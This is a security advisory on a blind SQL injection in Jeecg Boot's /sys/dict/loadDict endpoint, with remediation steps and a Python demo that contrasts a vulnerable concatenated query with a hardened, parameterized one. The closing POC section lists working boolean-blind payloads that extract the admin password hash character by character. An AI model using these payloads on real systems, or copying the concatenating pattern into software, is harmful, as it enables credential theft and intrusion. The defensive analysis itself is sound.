# Jeecg Boot SQL Injection Vulnerability Summary

## Vulnerability Overview

* **Vulnerability ID**: #9491
* **Vulnerability Type**: SQL Injection (SQLi)
* **Affected Versions**: Jeecg Boot <= v3.9.1
* **Vulnerable Endpoint**: `/sys/dict/loadDict/{dictCode}`
* **Root Cause**: The backend concatenates the user-supplied `keyword` parameter directly into the MyBatis `${filterSql}` fragment, so the value is interpreted as SQL text rather than bound as data, leading to SQL injection.

## Impact Scope

* **Privilege Requirement**: Low-privileged authenticated user.
* **Impact**: Attackers can use blind SQL injection to infer sensitive non-whitelisted columns (such as `password` and `salt` in the `sys_user` table), thereby obtaining credential material.
* **Defense Bypass**: Under the default configuration the signature mechanism is protected by a hardcoded key, allowing attackers to forge valid signatures.

## Remediation

1. **Code Level**: Replace string concatenation in dictionary search conditions with parameterized queries.
2. **Input Restriction**: Restrict dictionary search inputs to a strict whitelist of expected search characters, rejecting quotes, boolean operators, and SQL function syntax.
3. **Access Control**: Enforce server-side authorization on `/sys/dict/loadDict/*` and related dictionary endpoints, restricting access to internal users only.
4. **Key Management**: Remove the signature key from the default source code configuration and implement a securely generated key rotation mechanism.
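The following is an added example, not code from the Jeecg Boot project, showing remediation steps 1 and 2 side by side with the vulnerable pattern. It uses SQLite in place of the project's database, a constructed `sys_user` table with placeholder hashes, and a hypothetical `load_dict_*` pair: the vulnerable version splices the keyword into the SQL string the way `${filterSql}` does, while the hardened version enforces a character whitelist, escapes `LIKE` wildcards, and binds the keyword as a parameter (the equivalent of MyBatis `#{}` binding).

```python
import re
import sqlite3

# Constructed sample rows standing in for sys_user; the hashes are placeholders, not real data.
SAMPLE_USERS = [
    ("admin", "c0ffee-placeholder-hash", "salt1"),
    ("jeecg", "d1ce-placeholder-hash", "salt2"),
]

# The boolean-blind predicate from the write-up, used here only to show that the
# hardened path rejects it before it ever reaches the database.
TRUE_PREDICATE = "' and username='admin' and password like 'c%' and username like '%"

# Whitelist for dictionary search keywords (assumption: word characters, spaces and
# hyphens are all a dictionary search legitimately needs). Quotes, comparison and
# boolean operators, parentheses and SQL function syntax cannot pass this pattern.
KEYWORD_RE = re.compile(r"^[\w \-]{1,64}$")


def validate_keyword(keyword):
    """Reject any keyword containing characters outside the search whitelist."""
    if not KEYWORD_RE.match(keyword):
        raise ValueError("keyword contains characters outside the search whitelist")
    return keyword


def escape_like(keyword):
    """Escape LIKE metacharacters so the caller cannot widen the match with % or _."""
    return keyword.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def open_db():
    """Create an in-memory stand-in for sys_user populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_user (username TEXT, password TEXT, salt TEXT)")
    conn.executemany("INSERT INTO sys_user VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def load_dict_vulnerable(conn, keyword):
    """Mirror of the ${filterSql} pattern: the keyword becomes part of the SQL text."""
    sql = "SELECT username FROM sys_user WHERE username LIKE '%" + keyword + "%'"
    return [row[0] for row in conn.execute(sql)]


def load_dict_safe(conn, keyword):
    """Hardened path: whitelist, escape wildcards, then bind the keyword as data."""
    keyword = escape_like(validate_keyword(keyword))
    sql = "SELECT username FROM sys_user WHERE username LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, ("%" + keyword + "%",))]


def safe_rejects(conn, keyword):
    """True when the hardened path refuses the keyword instead of querying with it."""
    try:
        load_dict_safe(conn, keyword)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = open_db()
    # The predicate acts as a yes/no oracle against the concatenating version...
    print("vulnerable, true predicate :", load_dict_vulnerable(db, TRUE_PREDICATE))
    print("vulnerable, false predicate:", load_dict_vulnerable(db, TRUE_PREDICATE.replace("'c%'", "'x%'")))
    # ...and is rejected outright by the hardened version.
    print("hardened rejects predicate :", safe_rejects(db, TRUE_PREDICATE))
    print("hardened, plain search     :", load_dict_safe(db, "adm"))
```

The whitelist is deliberately the first check: even with parameter binding, passing raw `%` or `_` through a `LIKE` pattern would let a caller match every row, so the two controls complement each other rather than substitute for one another.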
## POC / Exploit Code

**Verify predicate against default seed data:**

```sql
' and username='admin' and substring(password,1,1)='c' and username like '%'
```

**True condition (returns non-empty result):**

```sql
' and username='admin' and password like 'c%' and username like '%'
```

**False condition (returns empty result):**

```sql
' and username='admin' and password like 'x%' and username like '%'
```

**Conditional construction for enumerating password hash values:**

```sql
' and username='admin' and password like 'c%' and username like '%'
' and username='admin' and password like 'ca%' and username like '%'
' and username='admin' and password like 'cda%' and username like '%'
```